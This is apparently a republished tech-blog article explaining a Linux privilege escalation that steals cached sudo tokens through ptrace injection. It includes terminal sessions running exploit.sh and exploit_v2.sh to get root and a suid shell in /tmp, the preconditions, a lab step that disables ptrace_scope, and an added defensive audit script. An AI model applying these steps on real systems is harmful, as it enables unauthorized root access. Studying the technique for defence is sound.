2025-04-16 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)06/02 Report--
This article shares how sudo tokens on Linux can be abused for privilege escalation. I hope you get something out of it; let's discuss it together!
How is the vulnerability exploited?

    $ sudo whatever
    [sudo] password for user:
    # Press <ctrl>+c since you don't have the password.
    # This creates an invalid sudo token.
    $ sh exploit.sh
    .... wait 1 seconds
    $ sudo -i    # no password required :)
    # id
    uid=0(root) gid=0(root) groups=0(root)

Implementation Requirements
1. Ptrace must be fully enabled (/proc/sys/kernel/yama/ptrace_scope == 0);
2. The current user must have a live process that holds a valid sudo token and runs under the same uid.
Note: The default password timeout is 15 minutes. If you use sudo twice in 15 minutes, you will not be asked to enter the user's sudo password again.
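From the defender's side, both requirements above can be checked on a host. The script below is an added example, not part of the original project or article; the function names are hypothetical, and it assumes the sudo cache lifetime is set through the sudoers `timestamp_timeout` option in the main sudoers file (reading `/etc/sudoers` normally requires root).

```shell
#!/bin/sh
# Added example (not from the article): audit the two preconditions it lists.
# File paths are parameters so the checks can run on constructed test files.
# Assumption: only the main sudoers file is read, not /etc/sudoers.d includes.

# Print exposed / restricted / missing / unknown for a Yama ptrace_scope file.
check_ptrace_scope() {
    file="${1:-/proc/sys/kernel/yama/ptrace_scope}"
    if [ ! -r "$file" ]; then
        echo "missing"      # no readable Yama sysctl: no Yama restriction seen
        return 0
    fi
    case "$(tr -d '[:space:]' < "$file")" in
        0)     echo "exposed" ;;     # any same-uid process may be attached to
        1|2|3) echo "restricted" ;;  # parent-only, admin-only, or no attach
        *)     echo "unknown" ;;
    esac
}

# Print the last timestamp_timeout set on a Defaults line, or "default".
sudo_cache_minutes() {
    file="${1:-/etc/sudoers}"
    value=$(grep -E '^[[:space:]]*Defaults' "$file" 2>/dev/null |
        sed -n 's/.*timestamp_timeout[[:space:]]*=[[:space:]]*\(-\{0,1\}[0-9.]*\).*/\1/p' |
        tail -n 1)
    echo "${value:-default}"
}

# Both conditions must hold for a cached token to be reusable by a peer process.
audit_sudo_token_exposure() {
    scope=$(check_ptrace_scope "$1")
    cache=$(sudo_cache_minutes "$2")
    if [ "$scope" != "restricted" ] && [ "$cache" != "0" ]; then
        echo "AT RISK: ptrace=$scope sudo_cache=$cache"
    else
        echo "OK: ptrace=$scope sudo_cache=$cache"
    fi
}

audit_sudo_token_exposure
```

Setting the `kernel.yama.ptrace_scope` sysctl to 1 or higher, or adding `Defaults timestamp_timeout=0` to sudoers so that no token is cached, removes one of the two requirements.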
Working mechanism
exploit.sh in the project directory injects shell code into all of the current user's processes and uses their sudo tokens to validate our own. It takes just three lines of shell code.
Usage example
Suppose you have obtained RCE but do not have the user's password, and the target user uses sudo: you can then steal their sudo token to escalate privileges!
How to simulate in an experimental environment?

    # echo 0 > /proc/sys/kernel/yama/ptrace_scope
    # Don't worry, this is not persistent across reboots

Open two terminal windows:
1. One of them executes sudo command, and then enters the correct user password (sudo ls);
2. The other executes exploit code according to the above method;
Use exploit_v2.sh to create a suid sh in /tmp/sh
If exploit_v1 doesn't work, you can try exploit_v2.sh:

    $ ./exploit_v2.sh
    Current process : 2441
    chmod: changing permissions of 'activate_sudo_token': Operation not permitted
    Injecting process 1721 -> bash
    Injecting process 2433 -> bash
    cat: /proc/2446/comm: No such file or directory
    Injecting process 2446 ->
    $ /tmp/sh -p
    # id
    uid=1001(test) gid=1001(test) euid=0(root) egid=0(root) groups=0(root),1001(test)

Having read this article, I believe you now have some understanding of how sudo tokens can be used for privilege escalation on Linux. Thank you for reading!